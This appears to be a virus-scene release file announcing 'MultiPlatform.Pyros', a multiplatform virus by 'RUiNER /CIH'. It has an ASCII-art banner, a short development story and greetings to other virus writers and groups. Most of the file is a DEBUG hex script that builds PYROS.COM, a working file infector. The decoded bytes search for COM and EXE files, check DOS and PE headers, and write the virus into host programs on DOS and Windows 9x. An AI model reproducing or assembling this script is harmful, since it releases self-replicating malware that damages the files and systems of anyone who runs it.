
Rat Heart's Note:
 You can find the working binary in the BINARIES directory and the
source code in a ZIP in the EXTRAS directory!
 Also, a debug script is attached at the bottom in case you want it! :)

Here's Ruiner's comments....


                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
                º      MultiPlatform.Pyros     º¿
                ÌÄ--ú-ú ú-ÄÄ--ú --Äú--ÄÄ--Äú--Ä¹³
                º    A Multiplatform virus!    º³
                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼³
                 ³ A new release by RUiNER /CIH ³
                 À--ú --Äú--ÄÄ--Äú--ÄÄ--ú-ú ú-ÄÄÙ

³Introduction³
À--ú --Äú--ÄÄÙ

  Well, I'm happy! :) I started this project in February and have just
finished it.. Although it's been two months, I'd done ALL the DOS half
in about three weeks in February, and  only started touching  it again
yesterday (2nd April), so this project,  although been in production a
long time, it has had rather a quite development time.  Quicker than I
had expected. 
 The virus was coded in two MAIN modules,  each having 4 or 5  include
files.  The whole development directory including the compiling  batch
file,  but  no  binaries, was 13 files  in 32Kb! Quite small, however,
there is a serious lack of commenting! Bwhawhawhawh ;)

 This  is my  final piece of work,  so I don't care if  you think it's
lame etc. 

³GREETZ³
À--ú -ÄÙ

PPL:
    Tatung      Get caught! That's smart!
    Lord Arz    What yer been up to lately?
    Flitnic     ditto.. ;)
    Z0MBiE      Did Tatung mail you in the end?
    Lord Julus  'lo! =)
    Rat Heart   Hey, what's up?

Teams (Current):
 CIH, SOS, CB, TI, ASM......

Teams (Old/Disbanded):
 VLAD, Phalcon/Skism......

~~~~~~~~~>8~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N PYROS.COM
E 0100 E8 04 00 DE AD 66 90 E8 00 00 5A 83 EA 0A 8B EA 
E 0110 1E 06 0E 0E 1F 07 B4 1A 8D 96 57 09 CD 21 8A 86 
E 0120 D1 00 3C 00 74 41 8D B6 5F 00 8D BE 57 00 66 A5 
E 0130 66 A5 E8 45 00 B4 1A BA 80 00 07 1F CD 21 8C C0 
E 0140 05 10 00 2E 01 86 59 00 2E 03 86 5D 00 FA 2E 8B 
E 0150 A6 5B 00 8E D0 FB EA 00 00 00 00 00 00 00 00 00 
E 0160 00 F0 FF 00 00 00 00 8D B6 D2 00 BF 00 01 A5 A5 
E 0170 A5 E8 06 00 07 1F 68 00 01 C3 B4 4E 8D 96 C3 00 
E 0180 B9 07 00 CD 21 E8 66 00 73 09 E8 7F 00 B4 4F CD 
E 0190 21 EB F2 B4 4E 8D 96 C9 00 B9 07 00 CD 21 E8 4D 
E 01A0 00 73 09 E8 66 00 B4 4F CD 21 EB F2 C3 5B 50 79 
E 01B0 72 6F 73 5D 00 5B 52 75 69 6E 65 72 20 2F 43 49 
E 01C0 48 5D 00 2A 2E 43 4F 4D 00 2A 2E 45 58 45 00 00 
E 01D0 00 00 CD 20 00 00 00 00 E9 00 00 DE AD 66 00 00 
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9F 
E 01F0 F6 D4 9E 58 C3 B8 02 3D 8D 96 75 09 CD 21 89 86 
E 0200 CF 00 C3 B4 3E 8B 9E CF 00 CD 21 C3 E8 E6 FF E8 
E 0210 DC FF 0F 83 8B 00 B4 3F 8B 9E CF 00 B9 40 00 8D 
E 0220 96 46 0F CD 21 81 BE 46 0F 4D 5A 74 75 81 BE 46 
E 0230 0F 5A 4D 74 6D 66 81 BE 71 09 00 80 00 00 7F 5E 
E 0240 81 BE 49 0F DE AD 75 07 80 BE 4B 0F 66 74 4F B8 
E 0250 02 42 8B 9E CF 00 33 C9 33 D2 CD 21 8D B6 46 0F 
E 0260 8D BE D2 00 A5 A5 A5 2D 03 00 89 86 D9 00 C6 86 
E 0270 D1 00 00 B4 40 8B 9E CF 00 B9 50 09 8D 96 07 00 
E 0280 CD 21 B8 00 42 8B 9E CF 00 33 C9 33 D2 CD 21 B4 
E 0290 40 8B 9E CF 00 B9 06 00 8D 96 D8 00 CD 21 E8 62 
E 02A0 FF C3 33 C0 03 86 5E 0F 3D 40 00 0F 84 BE 00 66 
E 02B0 81 BE 71 09 00 20 00 00 7C E4 81 BE 58 0F 63 4D 
E 02C0 74 DC C6 86 D1 00 01 C4 86 5A 0F 89 86 5F 00 8C 
E 02D0 86 61 00 C4 86 54 0F 8C 86 63 00 89 86 65 00 8B 
E 02E0 86 4E 0F B1 04 D3 E0 93 C4 86 71 09 8C C2 50 52 
E 02F0 2B C3 83 DA 00 B9 10 00 F7 F1 89 96 5A 0F 89 86 
E 0300 5C 0F 89 86 54 0F C7 86 58 0F 63 4D C7 86 56 0F 
E 0310 00 70 5A 58 05 50 09 83 D2 00 50 B1 09 D3 E8 D3 
E 0320 CA F9 13 D0 58 80 E4 01 89 96 4A 0F 89 86 48 0F 
E 0330 0E 07 B8 02 42 33 C9 33 D2 8B 9E CF 00 CD 21 B4 
E 0340 40 8D 96 07 00 B9 50 09 8B 9E CF 00 CD 21 B8 00 
E 0350 42 33 C9 33 D2 8B 9E CF 00 CD 21 B4 40 8D 96 46 
E 0360 0F B9 1A 00 8B 9E CF 00 CD 21 E9 31 FF 8B 96 82 
E 0370 0F 8B 8E 84 0F 89 96 E2 00 89 8E E4 00 B8 00 42 
E 0380 CD 21 B9 60 00 B4 3F 8D 96 46 0F CD 21 66 81 BE 
E 0390 46 0F 50 45 00 00 0F 85 04 FF 66 81 BE 82 0F FF 
E 03A0 FF 00 00 0F 8F F7 FE 66 83 BE 9E 0F FF 0F 84 ED 
E 03B0 FE 66 C7 86 9E 0F FF FF FF FF C6 86 D1 00 02 8D 
E 03C0 B6 6E 0F 8D BE DE 00 66 A5 66 8B 86 7A 0F 66 01 
E 03D0 86 DE 00 8B 86 4C 0F 48 B9 28 00 F7 E1 05 F8 00 
E 03E0 89 86 E6 00 8B 96 E2 00 8B 8E E4 00 03 D0 B8 00 
E 03F0 42 CD 21 8D 96 A6 0F B4 3F B9 28 00 CD 21 66 8B 
E 0400 86 BA 0F 66 03 86 B6 0F 66 89 86 EA 00 66 C7 86 
E 0410 CA 0F 40 00 00 C0 8D B6 B2 0F 8D BE 6E 0F 66 A5 
E 0420 66 8B 86 B6 0F 66 01 86 6E 0F 66 33 C0 05 A2 03 
E 0430 2D 07 00 66 01 86 6E 0F 66 33 C0 05 50 09 66 01 
E 0440 86 B6 0F 66 01 86 AE 0F 66 33 C0 05 E3 11 66 01 
E 0450 86 AE 0F 8B 96 E2 00 8B 8E E4 00 B8 00 42 CD 21 
E 0460 B4 40 8D 96 46 0F B9 60 00 CD 21 8B 96 E2 00 8B 
E 0470 8E E4 00 03 96 E6 00 B8 00 42 CD 21 B4 40 B9 28 
E 0480 00 8D 96 A6 0F CD 21 B8 00 42 8B 96 EA 00 8B 8E 
E 0490 EC 00 CD 21 B4 40 8D 96 07 00 B9 50 09 CD 21 E9 
E 04A0 FC FD 8B E8 81 ED 00 10 40 00 8D B5 3C 0D 40 00 
E 04B0 8D BD DD 15 40 00 A5 BF 00 00 F7 BF 66 81 3F 4D 
E 04C0 5A 75 70 03 7F 3C 81 3F 50 45 00 00 75 65 8B 7F 
E 04D0 78 81 C7 00 00 F7 BF 8B 77 20 81 C6 00 00 F7 BF 
E 04E0 8B 4F 24 81 C1 00 00 F7 BF 89 8D D9 15 40 00 8B 
E 04F0 4F 1C 81 C1 00 00 F7 BF 89 8D D5 15 40 00 8B 4F 
E 0500 18 8B D1 AD 05 00 00 F7 BF 81 38 47 65 74 50 75 
E 0510 20 81 78 04 72 6F 63 41 75 17 81 78 08 64 64 72 
E 0520 65 75 0E 66 81 78 0C 73 73 75 06 80 78 0E 00 74 
E 0530 0A E2 D0 8B 85 DD 15 40 00 50 C3 2B D1 D1 E2 03 
E 0540 95 D9 15 40 00 33 C0 66 03 02 C1 E0 02 03 85 D5 
E 0550 15 40 00 8B 10 81 C2 00 00 F7 BF 89 95 B5 15 40 
E 0560 00 8D BD B9 15 40 00 8D 85 72 15 40 00 50 E8 92 
E 0570 04 00 00 8D 85 81 15 40 00 50 E8 86 04 00 00 8D 
E 0580 85 8F 15 40 00 50 E8 7A 04 00 00 8D 85 96 15 40 
E 0590 00 50 E8 6E 04 00 00 8D 85 9E 15 40 00 50 E8 62 
E 05A0 04 00 00 8D 85 A5 15 40 00 50 E8 56 04 00 00 8D 
E 05B0 85 AD 15 40 00 50 E8 4A 04 00 00 8D 85 E9 15 40 
E 05C0 00 50 8D 85 21 0D 40 00 50 FF 95 B9 15 40 00 83 
E 05D0 F8 FF 74 23 89 85 E5 15 40 00 E8 5D 00 00 00 8D 
E 05E0 85 E9 15 40 00 50 FF B5 E5 15 40 00 FF 95 BD 15 
E 05F0 40 00 83 F8 00 75 E3 8D 85 E9 15 40 00 50 8D 85 
E 0600 27 0D 40 00 50 FF 95 B9 15 40 00 83 F8 FF 0F 84 
E 0610 1F FF FF FF 89 85 E5 15 40 00 E8 1D 00 00 00 8D 
E 0620 85 E9 15 40 00 50 FF B5 E5 15 40 00 FF 95 BD 15 
E 0630 40 00 83 F8 00 75 E3 E9 F7 FE FF FF 6A 02 8D 85 
E 0640 15 16 40 00 50 FF 95 C1 15 40 00 83 F8 FF 0F 84 
E 0650 D7 00 00 00 89 85 E1 15 40 00 6A 40 8D 85 9B 18 
E 0660 40 00 50 FF B5 E1 15 40 00 FF 95 C9 15 40 00 66 
E 0670 81 BD 9B 18 40 00 4D 5A 0F 84 AE 00 00 00 66 81 
E 0680 BD 9B 18 40 00 5A 4D 0F 84 9F 00 00 00 81 BD 09 
E 0690 16 40 00 00 80 00 00 0F 8F 82 00 00 00 66 81 BD 
E 06A0 9E 18 40 00 DE AD 75 09 80 BD A0 18 40 00 66 74 
E 06B0 6E 6A 02 6A 00 FF B5 E1 15 40 00 FF 95 D1 15 40 
E 06C0 00 8D B5 9B 18 40 00 8D BD 30 0D 40 00 A5 66 A5 
E 06D0 66 2D 03 00 66 89 85 37 0D 40 00 C6 85 2F 0D 40 
E 06E0 00 00 68 50 09 00 00 8D 85 65 0C 40 00 50 FF B5 
E 06F0 E1 15 40 00 FF 95 CD 15 40 00 6A 00 6A 00 FF B5 
E 0700 E1 15 40 00 FF 95 D1 15 40 00 6A 06 8D 85 36 0D 
E 0710 40 00 50 FF B5 E1 15 40 00 FF 95 CD 15 40 00 FF 
E 0720 B5 E1 15 40 00 FF 95 C5 15 40 00 C3 66 33 C0 66 
E 0730 03 85 B3 18 40 00 66 3D 40 00 0F 84 03 01 00 00 
E 0740 81 BD 09 16 40 00 00 20 00 00 7C D3 66 81 BD AD 
E 0750 18 40 00 63 4D 74 C8 C6 85 2F 0D 40 00 01 8B 85 
E 0760 AF 18 40 00 89 85 BD 0C 40 00 8B 85 A9 18 40 00 
E 0770 89 85 C1 0C 40 00 66 8B 85 A3 18 40 00 B1 04 66 
E 0780 D3 E0 66 93 66 C4 85 09 16 40 00 66 8C C2 50 52 
E 0790 66 2B C3 66 83 DA 00 66 B9 10 00 66 F7 F1 66 89 
E 07A0 95 AF 18 40 00 66 89 85 B1 18 40 00 66 89 85 A9 
E 07B0 18 40 00 66 C7 85 AD 18 40 00 63 4D 66 C7 85 AB 
E 07C0 18 40 00 00 70 5A 58 05 50 09 00 00 66 83 D2 00 
E 07D0 50 B1 09 66 D3 E8 66 D3 CA F9 66 13 D0 58 80 E4 
E 07E0 01 66 89 95 9F 18 40 00 66 89 85 9D 18 40 00 1E 
E 07F0 07 6A 02 6A 00 FF B5 E1 15 40 00 FF 95 D1 15 40 
E 0800 00 68 50 09 00 00 8D 85 65 0C 40 00 50 FF B5 E1 
E 0810 15 40 00 FF 95 CD 15 40 00 6A 00 6A 00 FF B5 E1 
E 0820 15 40 00 FF 95 D1 15 40 00 6A 40 8D 85 9B 18 40 
E 0830 00 50 FF B5 E1 15 40 00 FF 95 CD 15 40 00 E9 DC 
E 0840 FE FF FF 8B 95 D7 18 40 00 89 95 8B 18 40 00 6A 
E 0850 00 FF B5 8B 18 40 00 FF B5 E1 15 40 00 FF 95 D1 
E 0860 15 40 00 6A 60 8D 85 9B 18 40 00 50 FF B5 E1 15 
E 0870 40 00 FF 95 C9 15 40 00 81 BD 9B 18 40 00 50 45 
E 0880 00 00 0F 85 97 FE FF FF 81 BD D7 18 40 00 FF FF 
E 0890 00 00 0F 8F 87 FE FF FF 83 BD F3 18 40 00 FF 0F 
E 08A0 84 7A FE FF FF C7 85 F3 18 40 00 FF FF FF FF C6 
E 08B0 85 2F 0D 40 00 02 8D B5 C3 18 40 00 8D BD 3C 0D 
E 08C0 40 00 A5 8B 85 CF 18 40 00 01 85 3C 0D 40 00 33 
E 08D0 C0 66 8B 85 A1 18 40 00 66 48 B9 28 00 00 00 66 
E 08E0 F7 E1 66 05 F8 00 66 89 85 8F 18 40 00 8B 95 8B 
E 08F0 18 40 00 03 D0 6A 00 52 FF B5 E1 15 40 00 FF 95 
E 0900 D1 15 40 00 6A 28 8D 85 FB 18 40 00 50 FF B5 E1 
E 0910 15 40 00 FF 95 C9 15 40 00 8B 85 0F 19 40 00 03 
E 0920 85 0B 19 40 00 89 85 93 18 40 00 C7 85 1F 19 40 
E 0930 00 40 00 00 C0 8D B5 07 19 40 00 8D BD C3 18 40 
E 0940 00 A5 8B 85 0B 19 40 00 01 85 C3 18 40 00 33 C0 
E 0950 05 9B 03 00 00 01 85 C3 18 40 00 33 C0 05 50 09 
E 0960 00 00 01 85 0B 19 40 00 01 85 03 19 40 00 33 C0 
E 0970 05 F7 0A 00 00 01 85 03 19 40 00 6A 00 FF B5 8B 
E 0980 18 40 00 FF B5 E1 15 40 00 FF 95 D1 15 40 00 6A 
E 0990 40 8D 85 9B 18 40 00 50 FF B5 E1 15 40 00 FF 95 
E 09A0 CD 15 40 00 6A 00 8B 85 8B 18 40 00 03 85 8F 18 
E 09B0 40 00 50 FF B5 E1 15 40 00 FF 95 D1 15 40 00 6A 
E 09C0 28 8D 85 FB 18 40 00 50 FF B5 E1 15 40 00 FF 95 
E 09D0 CD 15 40 00 6A 00 FF B5 93 18 40 00 FF B5 E1 15 
E 09E0 40 00 FF 95 D1 15 40 00 68 50 09 00 00 8D 85 65 
E 09F0 0C 40 00 50 FF B5 E1 15 40 00 FF 95 CD 15 40 00 
E 0A00 E9 1A FD FF FF 5B 68 00 00 F7 BF FF 95 B5 15 40 
E 0A10 00 AB 53 C3 46 69 6E 64 46 69 72 73 74 46 69 6C 
E 0A20 65 41 00 46 69 6E 64 4E 65 78 74 46 69 6C 65 41 
E 0A30 00 5F 6C 6F 70 65 6E 00 5F 6C 63 6C 6F 73 65 00 
E 0A40 5F 6C 72 65 61 64 00 5F 6C 77 72 69 74 65 00 5F 
E 0A50 6C 6C 73 65 65 6B 00 
RCX
0957
W
Q

